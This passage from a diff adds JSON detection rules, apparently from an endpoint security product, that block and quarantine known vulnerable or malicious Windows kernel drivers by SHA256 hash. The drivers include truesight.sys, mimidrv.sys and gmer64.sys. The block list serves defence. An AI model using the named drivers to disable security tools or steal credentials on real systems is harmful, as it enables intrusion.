+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "527a8fd4-fa9c-5fd9-a1b5-4bbe8629a26a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.818190Z",
+ "creation_date": "2026-03-23T11:45:30.818192Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.818198Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1336469ec0711736e742b730d356af23f8139da6038979cfe4de282de1365d3b",
+ "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "527be761-bcfe-5978-a2c0-f3326d2ad6ff",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.611566Z",
+ "creation_date": "2026-03-23T11:45:29.611568Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.611574Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2fb8f2a0a32f2e73921a16a7836ff14122da45582aae742e6afd4d7ca15b3da3",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "527c2e61-93fb-583d-894b-638566768bef",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.978756Z",
+ "creation_date": "2026-03-23T11:45:29.978758Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.978763Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0052aa88e42055a2eed5ddd17c3499c692360155e5e031a211edfcef577acce3",
+ "comment": "Malicious Kernel Driver (aka gmer64.sys) [https://www.loldrivers.io/drivers/7ce8fb06-46eb-4f4f-90d5-5518a6561f15/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5295bf7a-16eb-5adc-8b5e-cc9facc3f581",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.481006Z",
+ "creation_date": "2026-03-23T11:45:30.481008Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.481013Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cbd4f66ae09797fcd1dc943261a526710acc8dd4b24e6f67ed4a1fce8b0ae31c",
+ "comment": "Vulnerable Kernel Driver (aka TdkLib64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5299bd65-8905-53bc-a00e-535c1a5a3674",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.818825Z",
+ "creation_date": "2026-03-23T11:45:30.818827Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.818832Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2e190b58266d9f7ce9681b834b0c7e6ab06e1305ab9258d714212a0bad58c0b4",
+ "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "529d4d24-ca23-5dc6-855d-b30ea991400a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.822318Z",
+ "creation_date": "2026-03-23T11:45:30.822320Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.822325Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c2898d715a1806b6cb574bff1dcd4bb2fd026ac624a2fbe71b7f17a64d0a9451",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "529e41e1-a567-5074-ba3a-e1832b7f427f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.477387Z",
+ "creation_date": "2026-03-23T11:45:31.477392Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.477402Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "44846eb04ec95ad86927cfc02e9c9a6d844aad4d1ec35f78af96ce947a34abcb",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "52aac6e5-5194-5326-87ea-5f7d0d06bebe",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.469204Z",
+ "creation_date": "2026-03-23T11:45:30.469207Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.469216Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e6745f1ac0dc8014e359672c7d5d1c01588ab4a68ea96eea2dea811dcdcf5131",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "52ad1c48-ef9c-5e31-b35b-8fab3426ba4b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.835236Z",
+ "creation_date": "2026-03-23T11:45:30.835239Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.835249Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "904bf42fb075bcf938002fb94cc789996f0382457c28b3840aac9c4f51d49c27",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "52b1f8d2-3e16-57ef-b881-1714ef44d937",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.143633Z",
+ "creation_date": "2026-03-23T11:45:31.143635Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.143640Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "befe8b4c4c12f393e783fdccd07f6172ef58f80034999243b5bee5067daa75df",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "52b6c001-178b-53c7-b472-61e1c6d3f279",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.475218Z",
+ "creation_date": "2026-03-23T11:45:31.475222Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.475232Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a09c5f5139ce37bf2341f475372528b0d904435e5c8bf00c9bb96a6bdc4c431c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "52bc6453-8972-5988-9327-a678846161dd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.487737Z",
+ "creation_date": "2026-03-23T11:45:31.487739Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.487745Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9ef0ef0e4a25261c5f26f42c079357746baf4bc4fe23844f2c2a0b3ca0a4ed61",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "52bd9ef3-dabf-5d05-ad32-a8849dfea35b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.142790Z",
+ "creation_date": "2026-03-23T11:45:31.142792Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.142798Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "18e45ac31f7750ad3bab2dfc6776648f1ecb8c95bdbe2c59fa3b2438d3879e43",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "52ce985a-38f6-581a-b388-8ef6f2f61541",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.811062Z",
+ "creation_date": "2026-03-23T11:45:31.811064Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.811069Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cc7f129e228fcb6f6b88fd3f7125bf406d8e243273d451861507a553b1cef028",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "52cec98f-d8b9-56db-aea6-d17f48db3f4d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.828636Z",
+ "creation_date": "2026-03-23T11:45:31.828639Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.828644Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7842397055abfd4e47b669d3c0aa004fbb8c4e8b9ed6c30c9a8cae2bb24c7a1e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "52d55f1d-ed66-5d5b-b749-bb726322610a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.465084Z",
+ "creation_date": "2026-03-23T11:45:30.465088Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.465096Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "673bbc7fa4154f7d99af333014e888599c27ead02710f7bc7199184b30b38653",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5304a61d-3ad5-5742-8ba6-7c908ba54b05",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.159633Z",
+ "creation_date": "2026-03-23T11:45:31.159635Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.159641Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6f91b41629b47e7b5e9102ae70712c7fa9b903399e2de4b50ba86bcbf8e32f5b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5306fcf3-00cf-5003-8bf3-028c2401d1ff",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.143315Z",
+ "creation_date": "2026-03-23T11:45:32.143317Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.143324Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b261d4065c03dcc732a951a9451b3a9f6054899eb3b8a4062dfed1c0ca3f3755",
+ "comment": "Vulnerable Kernel Driver (aka iQVW64.SYS) [https://www.loldrivers.io/drivers/4dd3289c-522c-4fce-b48e-5370efc90fa1/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5315e712-040e-529f-9e26-248e49dd8384",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.975639Z",
+ "creation_date": "2026-03-23T11:45:29.975641Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.975646Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3a65d14fd3b1b5981084cdbd293dc6f4558911ea18dd80177d1e5b54d85bcaa0",
+ "comment": "Novell XTier vulnerable driver (aka libnicm.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "53290af5-8482-59f6-a560-0ec05a691241",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.621581Z",
+ "creation_date": "2026-03-23T11:45:29.621583Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.621589Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "841335eeb6af68dce5b8b24151776281a751b95056a894991b23afae80e9f33b",
+ "comment": "ASUSTeK GPU vulnerable physmem driver (aka AsIO2_64.sys) [https://syscall.eu/blog/2020/03/30/asus_gio/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "533e53b0-6165-56a3-bcf3-a1688a95c014",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.159674Z",
+ "creation_date": "2026-03-23T11:45:31.159676Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.159681Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4c3720a4d0f874f5e33a916d51c9816bf97b0747d3fabee202b6dd65850da2fc",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "533f4a17-e0ca-53d7-bb1b-8ab99f92e8bb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.822282Z",
+ "creation_date": "2026-03-23T11:45:30.822284Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.822289Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a787df19468ba5fce5de825983251507867c6d3ff72d93e19466f2201013bab9",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "53407e2b-cef6-5c3e-98ff-322c638c16f9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
